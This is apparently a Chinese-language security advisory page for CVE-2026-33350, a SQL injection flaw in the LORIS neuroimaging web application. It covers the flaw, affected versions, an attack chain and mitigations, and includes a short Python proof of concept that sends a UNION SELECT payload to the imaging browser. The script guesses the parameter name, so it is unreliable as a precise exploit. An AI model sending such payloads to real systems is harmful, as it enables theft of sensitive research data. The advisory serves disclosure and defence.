CVE-2026-33350 CVSS 7.5 高危

CVE-2026-33350 LORIS SQL注入漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33350

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

LORIS

漏洞概述

LORIS（纵向在线研究和成像系统）是一个用于神经影像学研究的自托管Web应用程序。在27.0.3和28.0.1版本之前，成像浏览器的MRI反馈弹窗部分代码中存在SQL注入漏洞。攻击者无需身份认证即可利用该漏洞，通过网络发送恶意构造的SQL语句，进而访问或修改服务器上的敏感数据。该漏洞具有较高的机密性影响风险，建议管理员尽快升级至修复版本以避免潜在的数据泄露或篡改。

技术细节

该漏洞源于LORIS成像浏览器模块中MRI反馈弹窗功能的代码实现缺陷。在处理特定参数时，开发人员未对用户输入进行严格的类型检查或安全过滤，直接将其拼接到SQL查询语句中执行，导致了经典的SQL注入漏洞。由于CVSS向量显示攻击无需认证（PR:N）且无需用户交互（UI:N），远程攻击者可通过网络向受影响端点发送特制的HTTP数据包。利用过程中，攻击者可以通过控制SQL语法执行盲注或联合查询，从而绕过应用程序逻辑，直接与后端数据库交互。成功利用后，攻击者可获取高敏感度的机密信息（C:H），尽管官方向量评估完整性影响为无，但在实际场景中，若数据库账户具备写权限，攻击者仍可能对数据进行篡改或破坏。建议开发者审查MRI反馈相关代码段，采用参数化查询或ORM框架进行修复。

攻击链分析

STEP 1

信息收集

攻击者扫描网络，识别目标系统是否为LORIS应用，并确认其版本号是否受影响。

STEP 2

发送攻击载荷

攻击者构造包含恶意SQL语句的HTTP请求，发送至成像浏览器的MRI反馈弹窗接口。

STEP 3

执行注入

后端数据库解析并执行恶意SQL语句，攻击者根据回显或错误信息获取数据库结构及数据。

STEP 4

数据窃取

利用已获取的数据库权限，导出敏感的研究数据或系统凭证信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-33350 PoC for LORIS SQL Injection
# Target: MRI feedback popup window in Imaging Browser

target_url = "http://target-loris-instance/imaging_browser/"
# Vulnerable parameter example (actual param name depends on specific code)
payload = {
    "mri_feedback_id": "1' UNION SELECT NULL, version(), NULL-- -",
    "action": "submit"
}

try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check response for database version or errors indicating SQLi.")
        print(response.text[:500])
    else:
        print(f"[-] Server returned status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

LORIS < 27.0.3

LORIS >= 28.0.0, < 28.0.1

防御指南

临时缓解措施

如果无法立即升级，建议在网络层面限制对成像浏览器模块的非受信访问，或部署Web应用防火墙（WAF）规则以拦截常见的SQL注入攻击模式。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表